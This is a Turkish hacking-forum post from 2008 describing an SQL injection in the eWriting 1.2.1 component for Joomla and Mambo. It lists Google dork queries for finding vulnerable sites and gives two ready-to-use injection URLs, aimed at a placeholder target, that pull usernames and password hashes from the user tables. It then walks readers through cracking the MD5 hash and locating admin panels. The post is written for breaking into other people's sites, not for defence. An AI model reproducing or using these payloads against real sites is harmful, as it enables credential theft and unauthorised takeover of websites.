Konu: Mambo ve Joomla'da Remote SQL Injection Açıkları | Güncel
Tekil Mesaj gösterimi
Mambo ve Joomla'da Remote SQL Injection Açıkları | Güncel
Alt
  (#1)
ExPLocion is Offline
S.H.T Onursal Üye
 
ExPLocion - ait Kullanıcı Resmi (Avatar)
 
Mesaj Sayısı: 2,163
Açtığı Konu: 530

Level: 38 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Paylaşım: 370 / 927
Güç: 721 / 4035
Tecrübe: 9%

Üyelik tarihi: Jul 2007
Kullanıcı No: 107496
Nerden: ist4nbuL
Tecrübe Puanı: 106
REP Puanı : 2249
REP Seviyesi : ExPLocion has a reputation beyond reputeExPLocion has a reputation beyond reputeExPLocion has a reputation beyond reputeExPLocion has a reputation beyond reputeExPLocion has a reputation beyond reputeExPLocion has a reputation beyond reputeExPLocion has a reputation beyond reputeExPLocion has a reputation beyond reputeExPLocion has a reputation beyond reputeExPLocion has a reputation beyond reputeExPLocion has a reputation beyond repute
   
Icon3 Mambo ve Joomla'da Remote SQL Injection Açıkları | Güncel - 03-10-2008

Bugün Sizlere eWriting 1.2.1 - SQL injection Acigindan bahsedecegim..


Google Arama Kodumuz ;
1) "Powered by eWriting 1.2.1
2) allinurl:"com_ewriting"

Ilk defa Böyle Bir Konu Aciyorum..
Aciklari olan Siteler ; Joomla ve Mambo

Bu Yüzden Iki SQL Injection'umuz Var ;

1)Joomla'daki Sitelerin Acigina Varmak Icin ;
HEDEFSITE.COM/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--
================================================== ================================================== ==================================================
2)Mambo'daki Sitelerin Acigina Varmak Icin ;
HEDEFSITE.COM/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--

Aciklar Etkilidir..
Joomla'da Sonuca varamassaniz Mambo'da deneyiniz (:

Cikan Hashi >> [Linkleri Sadece Üyeler Görebilir..] >> SELECT ALL >> MD5'i GIR >> OK
================================================== ==============
Burda Arayabilirsiniz

Site Admin Panelleri
[Linkleri Sadece Üyeler Görebilir..]
[Linkleri Sadece Üyeler Görebilir..]
[Linkleri Sadece Üyeler Görebilir..]
[Linkleri Sadece Üyeler Görebilir..]

Not ;Acik Bana Ait degildir ! Anlatimi Tamamen Bana Aittir, ve izinsiz olarak Baska sitelerde Yayinlanmasi KESINLIKLE Yasaktir!


Saygilarimi Sunarim...
  
Alıntı ile Cevapla